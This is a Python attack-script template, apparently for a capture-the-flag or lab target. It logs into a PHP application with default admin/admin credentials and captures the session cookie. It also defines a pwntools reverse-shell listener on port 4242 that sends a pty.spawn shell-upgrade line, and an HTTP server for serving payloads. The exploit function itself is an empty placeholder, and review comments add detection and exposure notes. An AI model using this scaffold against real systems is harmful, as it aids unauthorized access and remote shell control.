import requests
from time import sleep
import threading # for http server
from pwn import listen
# Seconds passed to sleep() between retries in startHax().
waitTime = 2
# Base URL of the target application; request paths such as "login.php" are
# appended to it. Plain HTTP: the credentials posted by login() and the
# PHPSESSID cookie travel unencrypted.
url = "http://localhost/"
# Placeholder value; nothing in this file reads it.
# NOTE(review): presumably the address the HTTP server / listener is reached on - confirm.
myIP = "xxx"
# Marker text whose presence in the login response is treated as a rejected login.
invalidLoginResponse = "Invalid Username/Password"
def login(session):
    """Post the hard-coded ``admin``/``admin`` credentials to ``login.php``.

    Args:
        session: object exposing ``post(url, data=...)``; startHax() passes a
            ``requests.Session``, so any cookie set by the server stays on it.

    Returns:
        ``False`` (after printing the response body) when the body contains
        ``invalidLoginResponse``; ``True`` otherwise.
    """
    # Default credentials: this step only works against an installation whose
    # admin password was never changed, which is the condition to audit for.
    credentials = {"username": "admin", "password": "admin"}

    # NOTE(review): no timeout is passed, so this call blocks for as long as
    # the server keeps the connection open without answering.
    response = session.post(url + "login.php", data=credentials)

    # Success is inferred only from the ABSENCE of the rejection marker: an
    # error page or any other unexpected body is also reported as a login.
    rejected = invalidLoginResponse in response.text
    if rejected:
        print(response.text)
    return not rejected
def exploit(session, ticketName):
    """Unimplemented placeholder: takes both arguments and does nothing.

    Nothing in this file calls it, and it always returns ``None``.
    """
    return None
def handler():
    """Open a pwntools listener on TCP port 4242 and hand it to the operator.

    Four shell set-up lines are written to the listener, then the connection
    is switched to interactive mode. Nothing in this file calls this function.
    """
    conn = listen(4242)

    # Detection note: the ``pty.spawn`` one-liner is a widely used
    # interactive-shell upgrade string, so process command-line telemetry on
    # the host that executes it can match on it.
    # NOTE(review): the usual terminfo name is spelled ``xterm-256color``; the
    # TERM value below is kept exactly as written.
    setup_lines = (
        """ python -c 'import pty; pty.spawn("/bin/bash")' """,
        """ export TERM=xterm256-color """,
        """ alias ls='ls -la --color=auto' """,
        """ alias l='ls' """,
    )
    for line in setup_lines:
        conn.sendline(line)

    print("Starting interactive shell:")
    # The listener is never closed explicitly; it lives until the process exits.
    conn.interactive()
def startHTTPServer():
    """Serve files over HTTP on port 8000 until the process is stopped.

    Blocks forever in ``serve_forever()``; backgroundHTTPServer() runs it on
    a separate thread.
    """
    from http.server import HTTPServer, SimpleHTTPRequestHandler

    port = 8000
    # "0.0.0.0" binds every interface, and SimpleHTTPRequestHandler serves the
    # process's current working directory by default: everything in that
    # directory (this script included) is readable, without authentication,
    # by any host that can reach the port. Run it from a directory that holds
    # only what is meant to be served.
    bind_address = ("0.0.0.0", port)
    httpd = HTTPServer(bind_address, SimpleHTTPRequestHandler)
    print("serving http at port:" + str(port))
    httpd.serve_forever()
def backgroundHTTPServer():
    """Start startHTTPServer() on its own thread and return immediately."""
    # The thread is not marked as a daemon, so it keeps the interpreter (and
    # the open port) alive after the main thread has finished.
    server_thread = threading.Thread(target=startHTTPServer)
    server_thread.start()
def startHax():
    """Attempt one login against the target, retrying while it is unreachable.

    The loop repeats only on ``requests.exceptions.ConnectionError``, sleeping
    ``waitTime`` seconds between attempts. Once a request gets through, the
    function returns whether or not the login itself was accepted.
    """
    reached_target = False
    while not reached_target:
        try:
            with requests.Session() as session:
                print("Logging in... ", end='')
                try:
                    if not login(session):
                        print("Error logging in :(")
                    else:
                        jar = requests.utils.dict_from_cookiejar(session.cookies)
                        cookie = {'PHPSESSID': jar['PHPSESSID']}
                        # The session identifier is printed in clear: treat
                        # terminal output and logs of this run as sensitive.
                        print("Success! (cookie: "+str(cookie)+")")
                        # do stuff here
                except KeyError:
                    # login() reported success but no PHPSESSID cookie was set.
                    print("Error signing in - didn't get a cookie :/")
            reached_target = True
        except requests.exceptions.ConnectionError:
            # Only connection failures are retried; any other requests error
            # propagates to the caller.
            print("No route to host :((")
            sleep(waitTime)
# Runs the login/retry loop as soon as the module is executed or imported
# (there is no ``__main__`` guard). handler(), backgroundHTTPServer() and
# exploit() are defined above but never invoked from here.
startHax()